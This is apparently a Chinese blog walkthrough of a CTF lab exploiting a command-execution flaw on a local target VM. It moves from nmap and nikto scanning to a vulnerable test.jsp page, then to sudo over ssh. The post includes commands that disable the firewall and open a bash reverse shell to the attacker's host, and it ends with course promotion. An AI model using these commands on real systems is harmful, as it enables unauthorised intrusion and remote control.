CTF-命令执行【超详细】

最新推荐文章于 2025-04-11 15:38:29 发布
原创 最新推荐文章于 2025-04-11 15:38:29 发布 · 411 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#运维 #安全 #网络 #sqlserver #ssl

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.youkuaiyun.com/m0_63127854?type=blog

CTF-
专栏:https://blog.youkuaiyun.com/m0_63127854/category_11835386.html

网络安全交流社区:https://bbs.youkuaiyun.com/forums/angluoanquan

目录

命令执行漏洞介绍

实验环境

信息探测

nmap -sV 192.168.20.136

访问192.168.20.136:8080

敏感信息探测

进行系统命令执行

列出/tmp目录下的文件

列出/home目录下的内容

读取敏感信息

漏洞利用

利用ssh协议执行root权限的命令

关闭Ubuntu中的防火墙

提权

监听端口

靶机反弹shell

查看flag

命令执行漏洞介绍

当应用需要调用一些外部应用程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意命令到正常命令中,造成命令执行攻击。

调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有多虑用户输入的情况下,就会造成命令执行漏洞。

实验环境

kali 192.168.20.128

靶机 192.168.20.136

链接:https://pan.baidu.com/s/1OgpClNu8ggDEc_DBTRD57Q

提取码:t1x0

信息探测

nmap -sV 192.168.20.136

访问192.168.20.136:8080

发现敏感信息

敏感信息探测

nikto -host http://192.168.20.136:8080

发现/test.jsp并进行访问

进行系统命令执行

列出/tmp目录下的文件

列出/home目录下的内容

读取敏感信息

漏洞利用

利用ssh协议执行root权限的命令

ssh bill@localhost sudo -l

关闭Ubuntu中的防火墙

ssh bill@localhost sudo ufw disable

提权

监听端口

靶机反弹shell

ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.20.128/4444 0>&1

查看flag

最后

从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。

干货主要有:

①1000+CTF历届题库(主流和经典的应该都有了)

②CTF技术文档(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ CTF/渗透测试工具镜像文件大全

⑦ 2023密码学/隐身术/PWN技术手册大全

扫码领取

heike_沧海
关注
CTF命令执行
afei001
03-29 893
练习环境     攻击机:kali     靶机:Ubuntu 17.04 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 netmask 255.255.255.0 bro...
CTF-命令执行部分总结
weixin_44770698的博客
05-29 2011
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其中的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数中还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
Ctfer训练计划】——命令执行的解题技巧(持续更新中)
Demo不是emo的博客
12-31 6644
ctf命令执行题型解题方法汇总(持续更新中)
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 1680
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
ctf命令执行
qq_46540840的博客
03-24 945
文章目录前言一、知识要点二、举栗子1.CTFHub 技能树 综合过滤2.CTFHub 第一题附上一道简单题 前言 这里整理了一下基础题常用的过滤替代后续等深入学习时会再大幅不冲. 入门的话推荐ctfhub命令执行,上面有基础题适合小白入门比如还没入门的我wuwu… 一、知识要点 空格过滤替换品(常用为以下几个) %09(Tab键) IFS,IFS,IFS,IFS9,9,9,{IFS},$IFS < <> 重定向符 cat过滤替换品 more:一页一页的显示内容(linux环境下文本
CTF-命令执行漏洞(集成工具探测)
su__xiaoyan的博客
01-18 1278
实验环境 攻击者:192.168.0.25 靶机:192.168.0.36 实验流程 检测与靶机之间的网络连通性 信息收集 利用kali中的集成工具——sparta进行信息探测,该工具中集成了nmap、nikto、hydra、whatweb以及dirbuster等多种工具。 点击添加靶机,可以添加单个IP地址也可以添加IP地址范围 靶机IP地址添加完成后,会自动使用nmap进行端口扫描,对于探测出来的web站点进行详细信息探测,并对网站页面进行截图。 除此之外还可以根据不同端口的具体情况由用户选择进
CTF web入门之命令执行 完整版
最新发布
qq_41701460的博客
04-11 866
绕过思路:过滤了system,echo,这里可以使用passthru,但是这次还过滤了括号,所以passthru也没有办法用,这里使用文件包含,通过php://filter协议进行读取文件。可以使用使用空格绕过(%09) 也可也使用&拼接使用eval函数可以使用POST和GET其实一样的。**web36:**同web33 在前面的基础上,过滤了数字。.被过滤,则直接采用*,*表示多个字符,?**web33:**多了个双引号 和上面的题一样。**web30:**命令执行,需要严格的过滤。
CTF-Web习题:[GXYCTF2019]Ping Ping Ping
LJW123487的博客
07-25 1084
本题涉及知识点:命令执行漏洞,过滤绕过
深入探讨CTF-HTTP协议下PHP木马上传与命令执行技巧
上传木马和远程命令执行网络安全攻击中的核心技能,通过模拟这些攻击场景,CTF比赛不仅为参与者提供了学习和实践的平台,同时也加强了信息安全人员对各种攻击手段的认识和防范能力。了解和掌握这些知识点,对网络...
Bugku-CTF-聪明的php
m0_52484587的博客
08-04 1101
传递一个参数,可能标记文件的文件名是随机的:于是传一下参,在原网页后面加上/?a=1,发现网页出现了变化3.传入参数,一般情况下是文件包含,或者命令执行,而这道题目比较新颖,使用的是php模板注入4.根据测试2*4=8,确定是smarty模板注入测试phpinfo()函数5.真的是百密一疏,过滤了好多的函数,好在没有把过滤6.没有发现flag,但是发现_12016文件,直接读一波,cat被过滤了,我是用的是more得到flag。
CTF-命令执行
Luodehahajiang的博客
07-03 2637
ctf 命令执行 命令执行函数 命令执行绕过方法
CTF知识集-命令执行
星河梦瑾的博客
12-17 1426
includePATHAlinux的shell如果过滤空格,可以截取环境,例如执行命令env,会出现一堆命令。
CTF下的命令执行
热门推荐
Lemon's blog
04-28 1万+
前言: 之前学习过命令执行,但不是太深入,这次通过题目的训练来深入学习一下命令执行
CTF命令执行RCE
qq_53099119的博客
04-02 4567
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
CTF练习:HTTP服务之命令执行
qq_43233085的博客
12-05 688
CTF练习:HTTP服务之命令执行环境准备信息收集漏洞利用 靶机地址: 链接: https://pan.baidu.com/s/1axC2PaXqscbZKNpTq3dTkg 提取码: t8uz 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.91.88 ifconfig 查看靶机的IP,为172.19.91.8...
CTF命令执行篇 与 实际的命令执行漏洞
2301_81556781的博客
07-08 1335
7.preg_replace eg:preg_replace(pattern,replacement,subject,limit,count) [其中pattern,replacement,subject 是必填][一般只写command]𝑎𝑟𝑔𝑠:这是一个可变参数列表,用于传递给‘args:这是一个可变参数列表,用于传递给‘callback。:这是一个必须的参数,用于指定要匹配的模式,通常是一个正则表达式。' '|' '-' '(' ')' '反引号' '||' '&&' '&' '}' '{'
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值